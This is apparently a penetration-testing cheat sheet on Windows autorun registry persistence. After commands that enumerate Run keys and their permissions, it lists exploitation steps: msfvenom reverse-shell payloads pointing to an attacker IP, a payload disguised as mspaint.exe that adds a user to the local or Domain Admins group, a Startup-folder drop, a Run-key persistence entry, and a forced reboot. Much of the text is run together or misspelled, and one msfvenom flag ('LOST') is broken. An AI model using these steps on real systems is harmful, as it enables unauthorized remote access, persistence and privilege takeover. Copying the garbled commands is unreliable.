Autorun Registry Persistence
Overview
This method leverages Windows Registry autorun that allow programs to execute automatically at system startup. if permissions are misconfigured, a low privileged user can insert or modify entries that run with higher privileges upon the next user logon.
Check System Configurations
msconfigQuery Autorun Registry Locations
This registry keys control applications that launch at system startup. if writable by low-privileged users, they can be exploited for persistence or privilege escalation
Machine-Wide Autorum Leys
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runreg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOncereg query HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Runreg query HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOncereg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicereg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceServicereg query HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicereg query HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceServiceCurrent User Autorun Keys
reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runreg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOncereg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceExUseful Tools For Enumeration
PowerShell
Get Registry Key Property
Retrieves the properties (values and data) of a specified registry key path. Replace <registry-key-path> with a valid path like HKLM:\... or HKCU:\...
Get-ItemProperty -Path <registry-key-path>Query Global Autorun Entries
List programs that are set to run at system startup for all users. Located under HKEY_LOCAL_MACHINE
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"List SubKeys Under CurrentVersion
Displays all subkeys under currentVersion key. Useful for Discovering additional configuration locations
Get-ChildItem -Path <registry-key-path>Check Registry Key Permissions (ACL)
Get-Acl -Path <registry-key-path> | Format-ListReg.exe
reg query <registry-Key>PowerUp: Used ofr automated privilege escalation checks
Autoruns (Sysinternals) : Autoruns
autoruns64.exeUse the Logon tab to view startup entries
Accesschk (Systenternals) : AccessChk
accesschk64.exe -wvu " C:\Program Files\any_program"Inspecting ACLs and Permissions
Launching powershell with Execution Policy Bypass
powershell.exe -ep bypassCheck Folder or File Permission
Get-Acl "C:\Program Files\My Scripts\" | Format-ListGet-Acl "C:\Program Files\My Scripts\Delete_all_temp_files.bat"Get-Acl "C:\Program Files\My Scripts\Delete_all_temp_files.bat" | flGet-Acl "C:\Tools"Get-Acl "C:\Windows" | flGet-Acl "C:\inetpub\wwwroot\phpinfo.php" | Format-ListGet-Acl "C:\Temp\test.log" | Format-List -Property PSPath, SddlChange Registry Key Permissions
Get-Acl -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" | Format-ListGet-Acl "C:\Program Files\My Scripts\" | Format-ListGet-Acl "HKLM:\System\CurrentControlSet\Control" | Format-ListExploitation Steps
1. Generate Custom Payload
Reverse Shell Example
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exeEncoded x64 Reverse Shell
msfvenom --platform windows --arch x64 --payload windows/shell/reverse_tcp LOST=192.168.29.218 LPORT=443 --encoder x64/xor --iteration 9 -f exe --out rshell.exeAdd User to Admin Group
msfvenom -p windows/exec CMD='net localgroup administrators u1 /add' -f exe -o mspaint.exemsfvenom -p windows/exec CMD='net group "Domain Admins" u1 /add /DOMAIN' -f exe -o mspaint.exe2. Deploy Payload
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup3. Pegistry Autorun
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v rshell /t REG_EXPAND_SZ /f /d C:\users\Public\rshell.exe4. Reboot System
shutdown /r /t 0 /fLast updated